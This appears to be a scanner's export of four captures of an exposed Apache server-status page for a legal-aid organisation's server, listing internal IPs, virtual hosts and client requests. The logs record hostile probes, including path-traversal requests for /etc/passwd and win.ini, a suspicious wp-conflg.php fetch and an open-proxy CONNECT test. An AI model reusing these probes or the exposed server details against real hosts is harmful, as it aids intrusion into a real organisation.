Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 24-Oct-2025 21:36:09 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 564 Parent Server MPM Generation: 563 Server uptime: 563 days 4 hours 41 minutes 36 seconds Server load: 0.00 0.00 0.00 Total accesses: 13737301 - Total Traffic: 194.9 GB CPU Usage: u437.26 s43.25 cu0 cs0 - .000987% CPU load .282 requests/sec - 4300 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _..___._W____................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-563188820/88/810524_ 24.10161300.04.4213402.66 20.65.193.19http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-563-0/0/787602. 6.80199100.00.0013014.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-563-0/0/755950. 23.15199300.00.0012856.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-563224220/34/738020_ 9.7119964430.01.6312331.94 3.172.125.107http/1.1atlantalegalaid.org:8080GET /wp-includes/fonts/ HTTP/1.1 4-563218460/40/718711_ 11.4820002880.01.8111819.74 64.252.74.36http/1.1atlantalegalaid.org:8080GET /wp-content/index.php HTTP/1.1 5-563197310/86/698248_ 25.4819944390.04.2311513.61 3.172.125.66http/1.1atlantalegalaid.org:8080GET /wp-includes/widgets/ HTTP/1.1 6-563-0/0/658939. 2.38199400.00.0010833.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-563218510/37/633869_ 9.9519944390.01.6010337.63 3.172.125.70http/1.1atlantalegalaid.org:8080GET /wp-includes/rest-api/ HTTP/1.1 8-5632185725/107/602012W 14.730027.92.869758.71 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 9-563229730/3/581903_ 0.8116134420.00.139153.19 20.65.193.19http/1.1atlantalegalaid.org:8080MGLNDD_52.21.209.78_8080\n 10-563229780/2/513195_ 0.2819993280.00.008708.84 64.252.75.144http/1.1atlantalegalaid.org:8080GET /wp-content/uploads/index.php HTTP/1.1 11-563229790/3/477915_ 0.8119984440.00.137877.20 64.252.76.77http/1.1atlantalegalaid.org:8080GET /wp-content/wp-conflg.php HTTP/1.1 12-563229880/3/414232_ 1.1819954320.00.206552.08 3.172.125.71http/1.1atlantalegalaid.org:8080GET /wp-includes/js/crop/ HTTP/1.1 13-562-0/0/328079. 3.947402000.00.004769.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-562-0/0/289103. 3.019808800.00.004293.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-562-0/0/264814. 0.506489400.00.003766.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-562-0/0/230184. 1.969808700.00.003424.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-563-0/0/167504. 24.201037900.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-563-0/0/145381. 14.551036200.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-563-0/0/137583. 19.03199200.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-563-0/0/128229. 14.671036000.00.001821.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-562-0/0/116723. 1.806488900.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-562-0/0/121124. 0.019808100.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-562-0/0/106098. 0.089805200.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-562-0/0/108709. 0.009809300.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-562-0/0/85998. 0.009809200.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0087277200.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0087277100.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0087277000.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0087276800.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0087276900.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.0087276700.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82732444900.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00739584700.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15729396800.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0673122676620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23731226700.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00739588200.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00739588000.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32731226710080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00739588100.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00739587900.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00739587800.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00739587700.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00739587600.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00739587500.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001198821400.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001198821300.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001198821200.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001198821100.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001198821000.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001198820900.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001198820800.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001198820700.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001198820600.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001198820500.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021b7ea5ce0
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 23-Oct-2025 05:24:47 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 562 Parent Server MPM Generation: 561 Server uptime: 561 days 12 hours 30 minutes 13 seconds Server load: 0.00 0.00 0.00 Total accesses: 13734948 - Total Traffic: 194.8 GB CPU Usage: u377.08 s31.88 cu0 cs0 - .000843% CPU load .283 requests/sec - 4311 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers .W_.______.__................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-561-0/0/810384. 0.007800.00.0013395.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-5611078925/25/787424W 0.010028.00.0312999.91 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 2-56158130/136/755774_ 15.648200.05.2712850.02 15.158.226.72http/1.1elearning.alas.org:8080GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1 3-561-0/0/737860. 5.678000.00.0012324.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-56161940/115/718567_ 18.048200.06.8011815.11 15.158.226.101http/1.1elearning.alas.org:8080GET //news/wp-includes/wlwmanifest.xml HTTP/1.1 5-56176140/68/697990_ 12.278200.03.4211505.53 15.158.226.75http/1.1elearning.alas.org:8080GET //site/wp-includes/wlwmanifest.xml HTTP/1.1 6-56134020/205/658775_ 17.048200.05.6510828.06 15.158.226.76http/1.1elearning.alas.org:8080GET //wp-includes/wlwmanifest.xml HTTP/1.1 7-56134030/120/633745_ 17.008200.04.9010332.97 15.158.226.109http/1.1elearning.alas.org:8080GET //2019/wp-includes/wlwmanifest.xml HTTP/1.1 8-56134080/109/601818_ 18.768200.05.719753.50 15.158.226.67http/1.1elearning.alas.org:8080GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.1 9-561107900/0/581862_ 5.088700.00.009151.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-561-0/0/513173. 9.551340700.00.008707.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-56192510/33/477756_ 6.018200.01.807873.35 15.158.226.112http/1.1elearning.alas.org:8080GET //media/wp-includes/wlwmanifest.xml HTTP/1.1 12-56192560/45/414170_ 7.388200.02.176548.67 15.158.226.111http/1.1elearning.alas.org:8080GET //sito/wp-includes/wlwmanifest.xml HTTP/1.1 13-561-0/0/328054. 0.451340400.00.004769.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-561-0/0/289089. 4.207900.00.004293.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-561-0/0/264792. 0.001340500.00.003765.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-561-0/0/230172. 0.001340300.00.003424.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-561-0/0/167312. 0.001340200.00.002323.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-560-0/0/145305. 5.909208300.00.002058.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-560-0/0/137488. 0.008278500.00.002099.05 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 20-553-0/0/128161. 0.0072797700.00.001819.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-553-0/0/116703. 0.0672789500.00.001692.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-553-0/0/121121. 0.0072797600.00.001644.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-553-0/0/106096. 0.0072797300.00.001535.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-553-0/0/108708. 0.0072797500.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-553-0/0/85997. 0.0072797400.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0072808900.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0072808800.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0072808700.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0072808500.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0072808600.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.0072808400.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82717976600.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00725116400.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15714928500.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0671675846620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23716758400.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00725119900.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00725119700.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32716758410080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00725119800.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00725119600.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00725119500.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00725119400.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00725119300.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00725119200.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001184353100.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001184353000.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001184352900.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001184352800.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001184352700.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001184352600.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001184352500.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001184352400.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001184352300.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001184352200.00.00286.72 ::1http/1.1atlantalegalaid.or
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021e994884c
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 23-Oct-2025 02:19:22 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 562 Parent Server MPM Generation: 561 Server uptime: 561 days 9 hours 24 minutes 48 seconds Server load: 0.00 0.00 0.00 Total accesses: 13734618 - Total Traffic: 194.8 GB CPU Usage: u364.66 s31.14 cu0 cs0 - .000816% CPU load .283 requests/sec - 4312 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers .._W_____..__._................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-561-0/0/810383. 9.08227700.00.0013395.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-561-0/0/787399. 9.32228200.00.0012999.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-56158130/77/755715_ 12.914233010.04.3112849.06 3.172.105.70http/1.1atlantalegalaid.org:8080GET /images/favicon.ico HTTP/1.1 3-561924624/41/737835W 3.040026.90.7512323.29 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 4-56161940/91/718543_ 14.424312800.05.6511813.96 3.172.105.70http/1.1atlantalegalaid.org:8080GET /static/images/logo.png HTTP/1.1 5-56176140/40/697962_ 7.424672600.02.0311504.15 15.158.206.70http/1.1atlantalegalaid.org:8080GET /images/favicon-icon.png HTTP/1.1 6-56134020/167/658737_ 15.963972670.05.2510827.66 3.172.105.70http/1.1atlantalegalaid.org:8080GET /imgs/logox.png HTTP/1.1 7-56134030/65/633690_ 12.604102700.03.5210331.59 3.172.105.70http/1.1atlantalegalaid.org:8080GET /favicon.png HTTP/1.1 8-56134080/90/601799_ 15.471800.04.679752.45 70.132.1.135http/1.1short.alas.org:8080GET / HTTP/1.1 9-561-0/0/581862. 5.08227600.00.009151.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-561-0/0/513173. 9.55228300.00.008707.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-56192510/15/477738_ 2.944361610.00.857872.41 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1761185518.203447103500366 12-56192560/16/414141_ 2.853852720.00.726547.22 3.172.105.70http/1.1atlantalegalaid.org:8080GET /img/logo_512.png HTTP/1.1 13-561-0/0/328054. 0.45228000.00.004769.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-56192660/16/289080_ 2.8537300.00.794292.63 44.220.185.45http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 15-561-0/0/264792. 0.00228100.00.003765.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-561-0/0/230172. 0.00227900.00.003424.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-561-0/0/167312. 0.00227800.00.002323.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-560-0/0/145305. 5.908095800.00.002058.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-560-0/0/137488. 0.007166000.00.002099.05 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 20-553-0/0/128161. 0.0071685200.00.001819.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-553-0/0/116703. 0.0671677000.00.001692.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-553-0/0/121121. 0.0071685100.00.001644.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-553-0/0/106096. 0.0071684800.00.001535.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-553-0/0/108708. 0.0071685000.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-553-0/0/85997. 0.0071684900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0071696500.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0071696400.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0071696300.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0071696000.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0071696100.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.0071695900.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82716864200.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00724003900.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15713816000.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0671564606620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23715646000.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00724007400.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00724007200.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32715646010080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00724007300.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00724007100.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00724007000.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00724006900.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00724006800.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00724006700.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001183240600.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001183240500.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001183240400.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001183240300.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001183240200.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001183240100.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001183240000.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001183239900.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001183239800.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001183239700.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021dc8cf7d3
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 21-Oct-2025 06:13:47 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 560 Parent Server MPM Generation: 559 Server uptime: 559 days 13 hours 19 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 13732808 - Total Traffic: 194.7 GB CPU Usage: u361.68 s30.57 cu0 cs0 - .000811% CPU load .284 requests/sec - 4324 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers __..._.___._._._W............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-559276560/43/810235_ 1.4437000.00.4013391.87 204.76.203.18http/1.1atlantalegalaid.org:8080GET /bin/ HTTP/1.1 1-559276610/6/787314_ 0.8771100.00.4212996.61 176.65.149.157http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 2-559-0/0/755559. 5.83840500.00.0012842.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-559-0/0/737739. 7.88840400.00.0012320.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-559-0/0/718382. 1.283310900.00.0011806.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-559211280/93/697878_ 9.1321000.02.7511500.85 204.76.203.18http/1.1atlantalegalaid.org:8080GET /backup/ HTTP/1.1 6-559-0/0/658525. 14.93331102510.00.0010820.75 130.176.209.171http/1.1atlantalegalaid.org:8080GET /themes.php HTTP/1.1 7-559249800/63/633581_ 6.34192900.01.9610325.86 204.76.203.18http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-559249810/78/601685_ 14.8927900.02.309747.18 5.187.35.54http/1.1atlantalegalaid.org:8080GET /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 9-559215100/128/581802_ 15.513311450.04.739148.80 130.176.187.246http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-559-0/0/513035. 9.133311300.00.008705.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-559217750/148/477672_ 14.2727900.03.727869.29 5.187.35.54http/1.1atlantalegalaid.org:8080GET //%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini HTTP/ 12-559-0/0/414040. 3.333310700.00.006542.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-559249900/143/328043_ 10.41137100.03.464769.10 204.76.203.18http/1.1atlantalegalaid.org:8080GET /bins/ HTTP/1.1 14-559-0/0/289023. 0.233310800.00.004290.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-559249960/30/264727_ 4.34411300.01.283762.12 176.65.149.157http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 16-5592499725/100/230156W 6.480027.93.213424.40 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 17-558-0/0/167252. 0.0014149100.00.002320.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-558-0/0/145237. 0.0014149000.00.002056.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-558-0/0/137485. 0.0014148900.00.002099.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-553-0/0/128161. 0.0055811800.00.001819.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-553-0/0/116703. 0.0655803500.00.001692.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-553-0/0/121121. 0.0055811700.00.001644.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-553-0/0/106096. 0.0055811400.00.001535.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-553-0/0/108708. 0.0055811600.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-553-0/0/85997. 0.0055811500.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0055823000.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0055822900.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0055822800.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0055822600.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0055822700.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * 